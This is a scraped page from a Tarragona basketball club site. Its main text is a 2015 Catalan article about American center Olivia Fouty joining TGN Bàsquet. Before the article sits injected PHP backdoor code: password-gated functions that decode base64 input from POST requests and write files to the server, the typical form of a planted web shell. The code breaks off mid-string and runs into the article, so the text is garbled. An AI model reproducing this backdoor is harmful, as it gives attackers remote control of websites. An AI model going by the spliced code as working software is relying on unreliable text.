function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La pivot nord-americana Olivia Fouty ja s'entrena amb el TGN Bàsquet - Tgn Bàsquet Club -

La pivot nord-americana Olivia Fouty ja s’entrena amb el TGN Bàsquet

By
Updated: setembre 24, 2015

La pivot nord-americana Olivia Fouty ha fet aquest vespre el seu primer entrenament com a nova jugadora del TGN Bàsquet A. Fouty, de 23 anys, que va arribar ahir a Tarragona, ha militat en les universitats d’Eastern Michigan, amb qui va ser campiona de la conferència Mid-American Conference (NCAA, 1) i Texas A&M Corpus Christi (Southland Conference, NCAA 1). “És la primera vegada que surto dels Estats Units si descomptem un breu viatge fins a Canadà que vaig fer amb el meu equip per jugar-hi”, diu Fouty, que assegura que va descartar una altra oferta d’Irlanda per jugar al TGN Bàsquet: “Em va semblar una bona oportunitat. Vaig mirar quin tipus de ciutat era Tarragona i em va agradar molt, té molta història.” De fet, la jugadora ja ha pres contacte amb la cultura de la ciutat, doncs ahir va anar a veure la diada castellera de la Plaça de la Font, en plena festa de Santa Tecla, acompanyada per part del cos tècnic. “Hi havia un munt de gent pel carrer, va ser fantàstic i molt divertit”.

Fouty es considera una jugadora guanyadora i afirma que arriba al TGN Bàsquet a guanyar i ajudar a millorar a l’equip i les companyes. “M’agrada jugar ràpid a bàsquet, en atac de fora a dins, però també al pal alt i baix. Vaig fort al rebot tant en atac com en defensa. Però el meu joc favorit és jugar d’esquena al cèrcol”, diu mentre admet que no coneix gairebé res del bàsquet català i espanyol: “Només conec Pau Gasol [riu] però estic entusiasmada de començar aquesta experiència”. Una experiència que inclou l’aprenentatge d’una nova llengua, o dues. “Sí, fins ara m’ho tradueix tot Analía (Casado, la base extremenya) però treballaré de valent per fer-me entendre. Sé que també es parla català, o sigui que encara un repte més gran”.

 

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *